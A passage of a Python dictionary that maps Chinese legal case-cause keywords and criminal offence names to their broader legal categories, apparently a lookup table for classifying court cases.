u'危害国家安全罪',\r\n u'申请宣告公民恢复限制民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'保险人代位求偿': u'信用证纠纷',\r\n u'委托理财合同纠纷': u'合同纠纷',\r\n u'清算责任纠纷': u'与公司有关的纠纷',\r\n u'股东资格确认纠纷': u'与公司有关的纠纷',\r\n u'聚众扰乱军事管理区秩序罪': u'危害国防利益罪',\r\n u'保险诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'承揽': u'合同纠纷',\r\n u'公正': u'侵权责任纠纷',\r\n u'仿冒': u'知识产权权属侵权纠纷',\r\n u'公司': u'信用证纠纷',\r\n u'技术培训': u'知识产权合同纠纷',\r\n u'承揽合同纠纷': u'合同纠纷',\r\n u'发明专利临时保护期': u'知识产权权属侵权纠纷',\r\n u'土地承包经营权抵押权纠纷': u'担保物权纠纷',\r\n u'专利权侵权': u'知识产权权属侵权纠纷',\r\n u'因申请诉中证据保全损害责任纠纷': u'侵权责任纠纷',\r\n u'合资': u'合同纠纷',\r\n u'产品销售者': u'侵权责任纠纷',\r\n u'私放在押人员罪': u'渎职罪',\r\n u'水上运输人身损害责任纠纷': u'侵权责任纠纷',\r\n u'阻碍解救被拐卖、绑架妇女、儿童罪': u'渎职罪',\r\n u'巨额财产来源不明罪': u'贪污贿赂罪',\r\n u'海事赔偿责任限制基金': u'海事诉讼特别程序案件',\r\n u'彩票': u'合同纠纷',\r\n u'私分罚没财物罪': u'贪污贿赂罪',\r\n u'订做': u'合同纠纷',\r\n u'申请扣押船载货物': u'海事诉讼特别程序案件',\r\n u'损害商业信誉、商品声誉罪': u'破坏社会主义市场经济秩序罪',\r\n u'恢复原状': u'物权保护纠纷',\r\n u'强迫交易罪': u'破坏社会主义市场经济秩序罪',\r\n u'供用电': u'合同纠纷',\r\n u'公司合并纠纷': u'与公司有关的纠纷',\r\n u'证券承销合同纠纷': u'证券纠纷',\r\n u'占有物': u'占有保护纠纷',\r\n u'同居关系析产纠纷': u'婚姻家庭纠纷',\r\n u'商业': u'不正当竞争纠纷',\r\n u'聚众斗殴罪': u'妨害社会管理秩序罪',\r\n u'传播': u'知识产权权属侵权纠纷',\r\n u'电视购物合同纠纷': u'合同纠纷',\r\n u'追偿权': u'合同纠纷',\r\n u'健康保险合同纠纷': u'保险纠纷',\r\n u'请求确认债务人行为无效纠纷': u'与破产有关的纠纷',\r\n u'集体经济组织': u'所有权纠纷',\r\n u'法定继承': u'继承纠纷',\r\n u'装饰装修合同纠纷': u'合同纠纷',\r\n u'殡葬服务合同纠纷': u'合同纠纷',\r\n u'留置船': u'海事海商纠纷',\r\n u'脱逃罪': u'妨害社会管理秩序罪',\r\n u'特殊标志合同纠纷': u'知识产权合同纠纷',\r\n u'非法出售用于骗取出口退税、抵扣税款发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'组织、领导传销活动罪': u'破坏社会主义市场经济秩序罪',\r\n u'遗弃武器装备罪': u'军人违反职责罪',\r\n u'同业拆借': u'合同纠纷',\r\n u'故意伤害罪': u'侵犯公民人身权利、民主权利罪',\r\n u'公司减资纠纷': u'与公司有关的纠纷',\r\n u'期货经纪合同纠纷': u'期货交易纠纷',\r\n u'抚养费纠纷': u'婚姻家庭纠纷',\r\n u'船舶': u'海事海商纠纷',\r\n u'留置权': u'担保物权纠纷',\r\n u'著作财产': u'知识产权权属侵权纠纷',\r\n u'拍卖': u'合同纠纷',\r\n u'煽动军人逃离部队罪': u'危害国防利益罪',\r\n u'录像': u'知识产权权属侵权纠纷',\r\n u'变造货币罪': u'破坏社会主义市场经济秩序罪',\r\n u'取回权纠纷': u'与破产有关的纠纷',\r\n u'铁路机车': u'合同纠纷',\r\n u'非法获取计算机信息系统数据、非法控制计算机信息系统罪': u'妨害社会管理秩序罪',\r\n u'期货透支交易纠纷': u'期货交易纠纷',\r\n u'牧业承包': u'合同纠纷',\r\n u'侮辱国旗、国徽罪': u'妨害社会管理秩序罪',\r\n u'网络域名合同': u'知识产权合同纠纷',\r\n u'水上运输': u'侵权责任纠纷',\r\n u'执行分配': u'执行异议之诉',\r\n u'金融不良债权转让合同纠纷': u'合同纠纷',\r\n u'更换': u'物权保护纠纷',\r\n u'合并': u'信用证纠纷',\r\n u'煽动暴力抗拒法律实施罪': u'妨害社会管理秩序罪',\r\n u'申请诉前停止侵害著作权': u'申请诉前停止侵害知识产权案件',\r\n u'债务转移合同纠纷': u'合同纠纷',\r\n u'确认票据无效纠纷': u'票据纠纷',\r\n u'种植': u'合同纠纷',\r\n u'追��劳动报酬纠纷': u'劳动争议',\r\n u'相邻采光日照纠纷': u'所有权纠纷',\r\n u'擅自出卖、转让国有档案罪': u'妨害社会管理秩序罪',\r\n u'追偿': u'信用证纠纷',\r\n u'帮助犯罪分子逃避处罚罪': u'渎职罪',\r\n u'铁路修建合同纠纷': u'合同纠纷',\r\n u'仓储': u'合同纠纷',\r\n u'战时违抗命令罪': u'军人违反职责罪',\r\n u'破坏广播电视设施、公用电信设施罪': u'危害公共安全罪',\r\n u'被继承人': u'继承纠纷',\r\n u'特殊标志': u'知识产权权属侵权纠纷',\r\n u'有奖销售纠纷': u'不正当竞争纠纷',\r\n u'申请诉前财产保全': u'申请保全案件',\r\n u'故意泄露军事秘密罪': u'军人违反职责罪',\r\n u'联合运输': u'合同纠纷',\r\n u'过失损坏电力设备罪': u'危害公共安全罪',\r\n u'清算': u'信用证纠纷',\r\n u'代位求偿': u'信用证纠纷',\r\n u'证券上市合同纠纷': u'证券纠纷',\r\n u'组织播放淫秽音像制品罪': u'妨害社会管理秩序罪',\r\n u'铁路包裹运输合同纠纷': u'合同纠纷',\r\n u'债券': u'信用证纠纷',\r\n u'金融委托理财合同纠纷': u'合同纠纷',\r\n u'产品销售者责任纠纷': u'侵权责任纠纷',\r\n u'徇私舞弊低价折股、出售国有资产罪': u'破坏社会主义市场经济秩序罪',\r\n u'在建建筑物抵押权纠纷': u'担保物权纠纷',\r\n u'侵犯少数民族风俗习惯罪': u'侵犯公民人身权利、民主权利罪',\r\n u'专利申请权转让合同纠纷': u'知识产权合同纠纷',\r\n u'质押合同': u'合同纠纷',\r\n u'运输合同': u'合同纠纷',\r\n u'计算机软件开发合同纠纷': u'知识产权合同纠纷',\r\n u'房屋转让': u'合同纠纷',\r\n u'劳务': u'劳动争议',\r\n u'纵向垄断协议纠纷': u'垄断纠纷',\r\n u'定期租船': u'海事海商纠纷',\r\n u'制作、复制、出版、贩卖、传播淫秽物品牟利罪': u'妨害社会管理秩序罪',\r\n u'抵押权纠纷': u'担保物权纠纷',\r\n u'聚众扰乱公共场所秩序、交通秩序罪': u'妨害社会管理秩序罪',\r\n u'房地产开发经营合同纠纷': u'合同纠纷',\r\n u'购房': u'合同纠纷',\r\n u'联营合同纠纷': u'与企业有关的纠纷',\r\n u'贪污罪': u'贪污贿赂罪',\r\n u'生产、销售不符合卫生标准的化妆品罪': u'破坏社会主义市场经济秩序罪',\r\n u'聚众淫乱罪': u'妨害社会管理秩序罪',\r\n u'赡养纠纷': u'婚姻家庭纠纷',\r\n u'擅自使用知名商品特有名称包装装潢纠纷': u'不正当竞争纠纷',\r\n u'固体废物污染责任纠纷': u'侵权责任纠纷',\r\n u'擅自使用他人企业名称姓名纠纷': u'不正当竞争纠纷',\r\n u'技术转化': u'知识产权合同纠纷',\r\n u'虚报注册资本罪': u'破坏社会主义市场经济秩序罪',\r\n u'不服': u'行政管理与行政行为',\r\n u'企业承包经营': u'信用证纠纷',\r\n u'船舶碰撞': u'海事海商纠纷',\r\n u'申请为失踪人财产指定、变更代管人': u'宣告失踪、宣告死亡案件',\r\n u'共有物分割纠纷': u'所有权纠纷',\r\n u'债权纠纷': u'信用证纠纷',\r\n u'申请破产清算': u'与破产有关的纠纷',\r\n u'法定职责': u'行政管理与行政行为',\r\n u'强制猥亵、侮辱罪': u'侵犯公民人身权利、民主权利罪',\r\n u'申请破产重整': u'与破产有关的纠纷',\r\n u'演出合同纠纷': u'合同纠纷',\r\n u'交易结算': u'证券纠纷',\r\n u'船舶共有纠纷': u'海事海商纠纷',\r\n u'出租汽车运输合同纠纷': u'合同纠纷',\r\n u'拖航': u'海事海商纠纷',\r\n u'聚众持械劫狱罪': u'妨害社会管理秩序罪',\r\n u'表演权': u'知识产权权属侵权纠纷',\r\n u'商标权转让': u'知识产权合同纠纷',\r\n u'产品生产者责任纠纷': u'侵权责任纠纷',\r\n u'冒充军人招摇撞骗罪': u'危害国防利益罪',\r\n u'海上人身损害': u'海事海商纠纷',\r\n u'排除妨害纠纷': u'物权保护纠纷',\r\n u'特许经营合同纠纷': u'知识产权合同纠纷',\r\n u'撤销认定': u'认定财产无主案件',\r\n u'破坏电力设备罪': u'危害公共安全罪',\r\n u'土地承包经营权抵押合同纠纷': u'合同纠纷',\r\n u'发明专利实施许可合同纠纷': u'知识产权合同纠纷',\r\n u'证券返还纠纷': u'证券纠纷',\r\n u'客户交易结算资金纠纷': u'证券纠纷',\r\n u'帮工': u'侵权责任纠纷',\r\n u'变更公司登记': u'信用证纠纷',\r\n u'擅自发行股票、公司、企业债券罪': u'破坏社会主义市场经济秩序罪',\r\n u'业主撤销权纠纷': u'所有权纠纷',\r\n u'申请海事请求保全': u'海事诉讼特别程序案件',\r\n u'企业名称(商号)转让合同纠纷': u'知识产权合同纠纷',\r\n u'留置权纠纷': u'担保物权纠纷',\r\n u'合伙协议': u'合同纠纷',\r\n u'车位': u'所有权纠纷',\r\n u'物件脱落、坠落损害责任纠纷': u'侵权责任纠纷',\r\n u'船舶营运借款合同纠纷': u'海事海商纠纷',\r\n u'探望': u'婚姻家庭纠纷',\r\n u'网络域名转让合同纠纷': u'知识产权合同纠纷',\r\n u'漂流物返': u'所有权纠纷',\r\n u'用益物权确认纠纷': u'物权保护纠纷',\r\n u'不报、谎报安全事故罪': u'危害公共安全罪',\r\n u'验收备案': u'行政管理与行政行为',\r\n u'房地产开发': u'合同纠纷',\r\n u'排除妨害': u'物权保护纠纷',\r\n u'企业兼并合同纠纷': u'与企业有关的纠纷',\r\n u'竞业限制纠纷': u'劳动争议',\r\n u'房屋安置': u'合同纠纷',\r\n u'赠与': u'合同纠纷',\r\n u'非法低价出让国有土地使用权罪': u'渎职罪',\r\n u'定作': u'合同纠纷',\r\n u'非法进行节育手术罪': u'妨害社会管理秩序罪',\r\n u'破产和解': u'与破产有关的纠纷',\r\n u'海上通海水域打捞合同纠纷': u'海事海商纠纷',\r\n u'不解救被拐卖、绑架妇女、儿童罪': u'渎职罪',\r\n u'内幕交易': u'信用证纠纷',\r\n u'保安服务合同纠纷': u'合同纠纷',\r\n u'追索劳动报酬': u'劳动争议',\r\n u'夫妻': u'婚姻家庭纠纷',\r\n u'拐卖妇女、儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'隐私权纠纷': u'人格权纠纷',\r\n u'申请认可和执行台湾地区仲裁裁决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'申请拍卖': u'海事诉讼特别程序案件',\r\n u'股东名册': u'信用证纠纷',\r\n u'投资咨询': u'证券纠纷',\r\n u'环境污染责任纠纷': u'侵权责任纠纷',\r\n u'署名权': u'知识产权权属侵权纠纷',\r\n u'执行异议': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'工商变更登记': u'行政管理与行政行为',\r\n u'服务合同': u'合同纠纷',\r\n u'车库': u'所有权纠纷',\r\n u'破产': u'信用证纠纷',\r\n u'信托': u'信用证纠纷',\r\n u'侵害作品改编权纠纷': u'知识产权权属侵权纠纷',\r\n u'海上货物运输': u'海事海商纠纷',\r\n u'伪造冒用产品质量标志纠纷': u'不正当竞争纠纷',\r\n u'返还土地款纠纷': u'所有权纠纷',\r\n u'海事请求保全': u'海事诉讼特别程序案件',\r\n u'劫持船只、汽车罪': u'危害公共安全罪',\r\n u'公路货物运输': u'合同纠纷',\r\n u'产品责任': u'侵权责任纠纷',\r\n u'居间合同纠纷': u'合同纠纷',\r\n u'抢劫罪': u'侵犯财产罪',\r\n u'收养': u'婚姻家庭纠纷',\r\n u'故意损毁名胜古迹罪': u'妨害社会管理秩序罪',\r\n u'证券资信评级服务合同纠纷': u'证券纠纷',\r\n u'战时拒绝军事征收、征用罪': u'危害国防利益罪',\r\n u'公司分立纠纷': u'与公司有关的纠纷',\r\n u'侵害作品展览权纠纷': u'知识产权权属侵权纠纷',\r\n u'港口': u'海事海商纠纷',\r\n u'装修': u'合同纠纷',\r\n u'破产抵销权纠纷': u'与破产有关的纠纷',\r\n u'融资租赁合同': u'合同纠纷',\r\n u'强行平仓': u'期货交易纠纷',\r\n u'埋藏物返还纠纷': u'所有权纠纷',\r\n u'著作权转让': u'知识产权合同纠纷',\r\n u'分家': u'婚姻家庭纠纷',\r\n u'抵毁': u'不正当竞争纠纷',\r\n u'违令作战消极罪': u'军人违反职责罪',\r\n u'非法收购、运输、加工、出售国家重点保护植物、国家重点保护植物制品罪': u'妨害社会管理秩序罪',\r\n u'滥用市场支配地位纠纷': u'垄断纠纷',\r\n u'农业技术服务合同纠纷': u'合同纠纷',\r\n u'价款': u'合同纠纷',\r\n u'建设用地使用权抵押权纠纷': u'担保物权纠纷',\r\n u'申请扣押': u'海事诉讼特别程序案件',\r\n u'欺诈发行股票、债券罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请诉中': u'申请保全案件',\r\n u'专利权宣告无效': u'知识产权权属侵权纠纷',\r\n u'海运欺诈': u'海事海商纠纷',\r\n u'搬迁': u'合同纠纷',\r\n u'港口作业纠纷': u'海事海商纠纷',\r\n u'公路旅客运输合同纠纷': u'合同纠纷',\r\n u'拍卖合同': u'合同纠纷',\r\n u'临时用地': u'合同纠纷',\r\n u'挪用公款罪': u'贪污贿赂罪',\r\n u'船舶污染损害责任纠纷': u'海事海商纠纷',\r\n u'船舶融资租赁合同纠纷': u'海事海商纠纷',\r\n u'辞退': u'人事争议',\r\n u'农机作业服务合同纠纷': u'合同纠纷',\r\n u'农业承包合同纠纷': u'合同纠纷',\r\n u'占有物返还纠纷': u'占有保护纠纷',\r\n u'申请设立海事赔偿责任限制基金': u'海事诉讼特别程序案件',\r\n u'诉讼': u'合同纠纷',\r\n u'融资租赁合同纠纷': u'合同纠纷',\r\n u'侵害网络域名纠纷': u'知识产权权属侵权纠纷',\r\n u'放纵走私罪': u'渎职罪',\r\n u'雇用人损害': u'侵权责任纠纷',\r\n u'申请宣告公民无民事行为能力': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'夫妻财产约定纠纷': u'婚姻家庭纠纷',\r\n u'被撤销': u'宣告失踪、宣告死亡案件',\r\n u'公司增资': u'与公司有关的纠纷',\r\n u'拒绝交易纠纷': u'垄断纠纷',\r\n u'拒不救援友邻部队罪': u'军人违反职责罪',\r\n u'计算网络': u'知识产权权属侵权纠纷',\r\n u'组织卖淫罪': u'妨害社会管理秩序罪',\r\n u'旅游合同纠纷': u'合同纠纷',\r\n u'船舶损坏空中设施水下设施损害责任纠纷': u'海事海商纠纷',\r\n u'押金': u'合同纠纷',\r\n u'计算机软件开发': u'知识产权合同纠纷',\r\n u'垫款': u'合同纠纷',\r\n u'债权人代位': u'合同纠纷',\r\n u'非法采集、供应血液、制作、供应血液制品罪': u'妨害社会管理秩序罪',\r\n u'挂靠经营合同纠纷': u'与企业有关的纠纷',\r\n u'离婚': u'婚姻家庭纠纷',\r\n u'偷越国(边)境罪': u'妨害社会管理秩序罪',\r\n u'为他人提供书号出版淫秽书刊罪': u'妨害社会管理秩序罪',\r\n u'劳务者': u'侵权责任纠纷',\r\n u'建设工程分包合同纠纷': u'合同纠纷',\r\n u'责任保险合同纠纷': u'保险纠纷',\r\n u'征收': u'行政管理与行政行为',\r\n u'期货强行平仓纠纷': u'期货交易纠纷',\r\n u'检验合同纠纷': u'合同纠纷',\r\n u'进出口代理': u'合同纠纷',\r\n u'普通破产债权确认纠纷': u'与破产有关的纠纷',\r\n u'非国家工作人员受贿罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法出卖、转让武器装备罪': u'军人违反职责罪',\r\n u'使用虚假身份证件、盗用身份证件罪': u'妨害社会管理秩序罪',\r\n u'徇私舞弊发售发票、抵扣税款、出口退税罪': u'渎职罪',\r\n u'航空旅客运输': u'合同纠纷',\r\n u'提单质权纠纷': u'担保物权纠纷',\r\n u'禁业': u'劳动争议',\r\n u'支付令': u'督促程序案件',\r\n u'失职造成珍贵文物损毁、流失罪': u'渎职罪',\r\n u'票据付款请求权纠纷': u'票据纠纷',\r\n u'不明抛掷物、坠落物损害责任纠纷': u'侵权责任纠纷',\r\n u'洗钱罪': u'破坏社会主义市场经济秩序罪',\r\n u'申请拍卖扣押船载货物': u'海事诉讼特别程序案件',\r\n u'民用航空器损害责任纠纷': u'侵权责任纠纷',\r\n u'抚养纠纷': u'婚姻家庭纠纷',\r\n u'专利': u'知识产权合同纠纷',\r\n u'股东名册记载纠纷': u'与公司有关的纠纷',\r\n u'绑架罪': u'侵犯公民人身权利、民主权利罪',\r\n u'水路货物运输合同纠纷': u'合同纠纷',\r\n u'海事债权确权纠纷': u'海事海商纠纷',\r\n u'损害公司利益': u'与公司有关的纠纷',\r\n u'侵害经营秘密纠纷': u'不正当竞争纠纷',\r\n u'认定工伤': u'行政管理与行政行为',\r\n u'伪造、变造、转让金融机构经营许可证、批准文件罪': u'破坏社会主义市场经济秩序罪',\r\n u'财产损失保险合同纠纷': u'保险纠纷',\r\n u'入伙纠纷': u'合伙企业纠纷',\r\n u'欺诈客户': u'证券纠纷',\r\n u'代替考试罪': u'妨害社会管理秩序罪',\r\n u'捆绑销售': u'不正当竞争纠纷',\r\n u'申请认可和执行台湾地区法院民事判决': u'申请承认与执行法院判决、仲裁裁决案件',\r\n u'集成电路布图设计创作': u'知识产权合同纠纷',\r\n u'上市公司收购纠纷': u'与公司有关的纠纷',\r\n u'购买': u'合同纠纷',\r\n u'他人企业名称': u'不正当竞争纠纷',\r\n u'公司关联交易损害责任纠纷': u'与公司有关的纠纷',\r\n u'海运集装箱保管合同纠纷': u'海事海商纠纷',\r\n u'破产撤销权纠纷': u'与破产有关的纠纷',\r\n u'中外合作勘探': u'合同纠纷',\r\n u'技术秘密让与合同纠纷': u'知识产权合同纠纷',\r\n u'植物新品种': u'知识产权权属侵权纠纷',\r\n u'技术转让': u'知识产权合同纠纷',\r\n u'物权确认': u'物权保护纠纷',\r\n u'差别待遇纠纷': u'垄断纠纷',\r\n u'产品质量标志': u'知识产权权属侵权纠纷',\r\n u'修理合同纠纷': u'合同纠纷',\r\n u'合同诈骗罪': u'破坏社会主义市场经济秩序罪',\r\n u'渔船承包': u'海事海商纠纷',\r\n u'知识产权质权纠纷': u'担保物权纠纷',\r\n u'通海水域': u'海事海商纠纷',\r\n u'海事': u'海事海商纠纷',\r\n u'共有': u'所有权纠纷',\r\n u'组织未成年人进行违反治安管理活动罪': u'侵犯公民人身权利、民主权利罪',\r\n u'虚假陈述': u'信用证纠纷',\r\n u'附义务赠与': u'合同纠纷',\r\n u'侵占��货交易': u'期货交易纠纷',\r\n u'利用影响力受贿罪': u'贪污贿赂罪',\r\n u'申请海事债权登记与受偿': u'海事诉讼特别程序案件',\r\n u'海上通海水域货物运输合同纠纷': u'海事海商纠纷',\r\n u'仓储合同纠纷': u'合同纠纷',\r\n u'侵害技术秘密纠纷': u'不正当竞争纠纷',\r\n u'劳务合同': u'合同纠纷',\r\n u'经营秘密让与': u'知识产权合同纠纷',\r\n u'民事信托': u'信托纠纷',\r\n u'定做': u'合同纠纷',\r\n u'基金回购': u'证券纠纷',\r\n u'持有、使用假币罪': u'破坏社会主义市场经济秩序罪',\r\n u'信用卡纠纷': u'合同纠纷',\r\n u'乡镇企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n u'实物交割': u'期货交易纠纷',\r\n u'邻接权许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'股利': u'信用证纠纷',\r\n u'故意毁坏财物罪': u'侵犯财产罪',\r\n u'申请中止支付保函项下款项': u'申请保全案件',\r\n u'抢夺、窃取国有档案罪': u'妨害社会管理秩序罪',\r\n u'借款': u'合同纠纷',\r\n u'农村土地承包': u'合同纠纷',\r\n u'票据': u'信用证纠纷',\r\n u'申请确定选民资格': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'吸收客户资金不入账罪': u'破坏社会主义市场经济秩序罪',\r\n u'扰乱无线电通讯管理秩序罪': u'妨害社会管理秩序罪',\r\n u'监护': u'婚姻家庭纠纷',\r\n u'大型群众性活动重大安全事故罪': u'危害公共安全罪',\r\n u'议付': u'合同纠纷',\r\n u'收买被拐卖的妇女、儿童罪': u'侵犯公民人身权利、民主权利罪',\r\n u'私分国有资产罪': u'贪污贿赂罪',\r\n u'劳动': u'劳动争议',\r\n u'限制民事': u'认定公民无民事行为能力、限制民事行为能力案件',\r\n u'动产质权纠纷': u'担保物权纠纷',\r\n u'联营': u'信用证纠纷',\r\n u'旅游合同': u'合同纠纷',\r\n u'农村土地承包合同纠纷': u'合同纠纷',\r\n u'雇用童工从事危重劳动罪': u'侵犯公民人身权利、民主权利罪',\r\n u'共同海损纠纷': u'海事海商纠纷',\r\n u'侵害计算机软件著作权纠纷': u'知识产权权属侵权纠纷',\r\n u'销售假冒注册商标的商品罪': u'破坏社会主义市场经济秩序罪',\r\n u'离退休人员返聘合同纠纷': u'合同纠纷',\r\n u'医疗服务': u'合同纠纷',\r\n u'技术委托': u'知识产权权属侵权纠纷',\r\n u'海事强制令': u'海事诉讼特别程序案件',\r\n u'修理重作更换纠纷': u'物权保护纠纷',\r\n u'非法出售、提供试题、答案罪': u'妨害社会管理秩序罪',\r\n u'隐瞒境外存款罪': u'贪污贿赂罪',\r\n u'市场支配': u'垄断纠纷',\r\n u'追偿权纠纷': u'合同纠纷',\r\n u'食品监管渎职罪': u'渎职罪',\r\n u'阻碍军人执行职务罪': u'危害国防利益罪',\r\n u'邻接权转让合同纠纷': u'知识产权合同纠纷',\r\n u'铁路运输人身损害责任纠纷': u'侵权责任纠纷',\r\n u'侵害商业秘密纠纷': u'不正当竞争纠纷',\r\n u'债权人代位权纠纷': u'合同纠纷',\r\n u'商业秘密合同': u'知识产权合同纠纷',\r\n u'非法携带武器、管制刀具、爆炸物参加集会、游行、示威罪': u'妨害社会管理秩序罪',\r\n u'娱乐服务合同纠纷': u'合同纠纷',\r\n u'非法制造、买卖、运输、邮寄、储存枪支、弹药、爆炸物罪': u'危害公共安全罪',\r\n u'证券': u'信用证纠纷',\r\n u'人身保险合同纠纷': u'保险纠纷',\r\n u'股金': u'信用证纠纷',\r\n u'公司解散纠纷': u'与公司有关的纠纷',\r\n u'网络域名合同纠纷': u'知识产权合同纠纷',\r\n u'申请支付令': u'督促程序案件',\r\n u'中外合资经营企业承包经营合同纠纷': u'与企业有关的纠纷',\r\n u'执行损害': u'侵权责任纠纷',\r\n u'取水权纠纷': u'用益物权纠纷',\r\n u'因申请诉前停止侵害注册商标专用权损害责任纠纷': u'知识产权权属侵权纠纷',\r\n u'海损': u'海事海商纠纷',\r\n u'其他科技成果': u'知识产权权属侵权纠纷',\r\n u'聚众冲击军事禁区罪': u'危害国防利益罪',\r\n u'放纵制售伪劣商品犯罪行为罪': u'渎职罪',\r\n u'居间合同': u'合同纠纷',\r\n u'非法出租、出借枪支罪': u'危害公共安全罪',\r\n u'经济补偿金纠纷': u'劳动争议',\r\n u'车辆租赁': u'合同纠纷',\r\n u'违规出具金融票证罪': u'破坏社会主义市场经济秩序罪',\r\n u'牧业承包合同纠纷': u'合同纠纷',\r\n u'公司证照返还纠纷': u'与公司有关的纠纷',\r\n u'战时造谣惑众罪': u'军人违反职责罪',\r\n u'招摇撞骗罪': u'妨害社会管理秩序罪',\r\n u'植物新品种实施许可合同纠纷': u'知识产权合同���纷',\r\n u'产品运输者责任纠纷': u'侵权责任纠纷',\r\n u'申请诉中财产保全': u'申请保全案件',\r\n u'劳务派遣工作人员侵权责任纠纷': u'侵权责任纠纷',\r\n u'组织、领导、参加恐怖组织罪': u'危害公共安全罪',\r\n u'伪造产地纠纷': u'不正当竞争纠纷',\r\n u'海上通海水域运输联营合同纠纷': u'海事海商纠纷',\r\n u'违法发放贷款罪': u'破坏社会主义市场经济秩序罪',\r\n u'擅自进口固体废物罪': u'妨害社会管理秩序罪',\r\n u'申请诉前证据保全': u'申请保全案件',\r\n u'合作创作合同纠纷': u'知识产权合同纠纷',\r\n u'变更赡养关系纠纷': u'婚姻家庭纠纷',\r\n u'定金合同': u'合同纠纷',\r\n u'股票回购合同纠纷': u'证券纠纷',\r\n u'生产、销售不符合标准的医用器材罪': u'破坏社会主义市场经济秩序罪',\r\n u'非法出售发票罪': u'破坏社会主义市场经济秩序罪',\r\n u'叛逃罪': u'危害国家安全罪',\r\n u'清偿行为': u'与破产有关的纠纷',\r\n u'信用证': u'信用证纠纷',\r\n u'教育培训': u'合同纠纷',\r\n u'结算资金': u'信用证纠纷',\r\n u'非法经营罪': u'破坏社会主义市场经济秩序罪',\r\n u'社会保险纠纷': u'劳动争议',\r\n u'非法吸收公众存款罪': u'破坏社会主义市场经济秩序罪',\r\n u'著作权侵权': u'知识产权权属侵权纠纷',\r\n u'请求变更公司登记纠纷': u'与公司有关的纠纷',\r\n u'私放俘虏罪': u'军人违反职责罪',\r\n u'信用证欺诈纠纷': u'信用证纠纷',\r\n u'海运': u'海事海商纠纷',\r\n u'船': u'海事海商纠纷',\r\n u'外观设计专利实施许可合同纠纷': u'知识产权合同纠纷',\r\n u'保证合同纠纷': u'合同纠纷',\r\n u'录音录像制作者权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'恢复原状纠纷': u'物权保护纠纷',\r\n u'广告合同纠纷': u'合同纠纷',\r\n u'意外伤害保险': u'保险纠纷',\r\n u'经济适用房转让': u'合同纠纷',\r\n u'重大责任事故罪': u'危害公共安全罪',\r\n u'遗弃罪': u'侵犯公民人身权利、民主权利罪',\r\n u'报复陷害罪': u'侵犯公民人身权利、民主权利罪',\r\n u'企业借贷纠纷': u'合同纠纷',\r\n u'银行卡纠纷': u'合同纠纷',\r\n u'占有排除妨害纠纷': u'占有保护纠纷',\r\n u'一般人格权纠纷': u'人格权纠纷',\r\n u'传播淫秽物品罪': u'妨害社会管理秩序罪',\r\n u'拍卖转让协议': u'合同纠纷',\r\n u'侵害商标权纠纷': u'知识产权权属侵权纠纷',\r\n u'期货欺诈': u'期货交易纠纷',\r\n u'群众性': u'侵权责任纠纷',\r\n u'船舶触碰损害责任纠纷': u'海事海商纠纷',\r\n u'债务支付': u'宣告失踪、宣告死亡案件',\r\n u'申请诉前停止侵害专利权': u'申请诉前停止侵害知识产权案件',\r\n u'房地产价格评估': u'合同纠纷',\r\n u'颠覆国家政权罪': u'危害国家安全罪',\r\n u'房屋拆迁': u'合同纠纷',\r\n u'监护人责任纠纷': u'侵权责任纠纷',\r\n u'公益信托': u'信托纠纷',\r\n u'伪造、变造股票、公司、企业债券罪': u'破坏社会主义市场经济秩序罪',\r\n u'保险': u'保险纠纷',\r\n u'徇私舞弊减刑、假释、暂予监外执行罪': u'渎职罪',\r\n u'单位受贿罪': u'贪污贿赂罪',\r\n u'航空运输': u'侵权责任纠纷',\r\n u'战时拒绝、故意延误军事订货罪': u'危害国防利益罪',\r\n u'徇私舞弊不移交刑事案件罪': u'渎职罪',\r\n u'操纵期货交易市场责任纠纷': u'期货交易纠纷',\r\n u'破坏性采矿罪': u'妨害社会管理秩序罪',\r\n u'表演合同': u'知识产权合同纠纷',\r\n u'网络域名许可使用合同纠纷': u'知识产权合同纠纷',\r\n u'医疗损害责任纠纷': u'侵权责任纠纷',\r\n u'高度危险活动损害责任纠纷': u'侵权责任纠纷',\r\n u'中外合资经营企业合同纠纷': u'与企业有关的纠纷',\r\n u'侵害作品署名权纠纷': u'知识产权权属侵权纠纷',\r\n u'国债回购': u'证券纠纷',\r\n u'对违法票据承兑、付款、保证罪': u'破坏社会主义市场经济秩序罪',\r\n u'不当得利纠纷': u'不当得利纠纷',\r\n u'贪污': u'贪污贿赂罪',\r\n u'同业拆借纠纷': u'合同纠纷',\r\n u'债权转股权': u'与企业有关的纠纷',\r\n u'非法提供麻醉药品、精神药品罪': u'妨害社会管理秩序罪',\r\n u'产品仓储者责任纠纷': u'侵权责任纠纷',\r\n u'劳动合同': u'劳动争议',\r\n u'水上运输财产损害责任纠纷': u'侵权责任纠纷',\r\n u'重婚罪': u'侵犯公民人身权利、民主权利罪',\r\n u'林业承包': u'合同纠纷',\r\n u'技术进口合同纠纷': u'知识产权合同纠纷',\r\n u'海上通海水域养殖损害责任纠纷': u'海事海商纠纷',\r\n u'植物新品种权权属纠纷': u'知识产权权属侵权纠纷',\r\n u'非法种植毒品原植物罪': u'妨害社会管理秩序罪',\r\n u'地役权纠纷': u'用益物权纠纷',\r\n u'盗窃罪': u'侵犯财产罪',\r\n u'人事争议': u'与公司有关的纠纷',\r\n u'侵害植物新品种权纠纷': u'知识产权权属侵权纠纷',\r\n u'工程款': u'合同纠纷',\r\n u'组织出卖人体器官罪': u'侵犯公民人身权利、民主权利罪',\r\n u'票据代理纠纷': u'票据纠纷',\r\n u'侵犯商业秘密罪': u'破坏社会主义市场经济秩序罪',\r\n u'交通肇事罪': u'危害公共安全罪',\r\n u'非法收购、运输、出售珍贵、濒危野生动物、珍贵、濒危野生动物制品罪': u'妨害社会管理秩序罪',\r\n u'农村房屋买卖合同纠纷': u'合同纠纷',\r\n u'人身自由权': u'人格权纠纷',\r\n u'侵害录音录像制作者权纠纷': u'知识产权权属侵权纠纷',\r\n u'期货实物交割纠纷': u'期货交易纠纷',\r\n u'虚假出资、抽逃出资罪': u'破坏社会主义市场经济秩序罪',\r\n 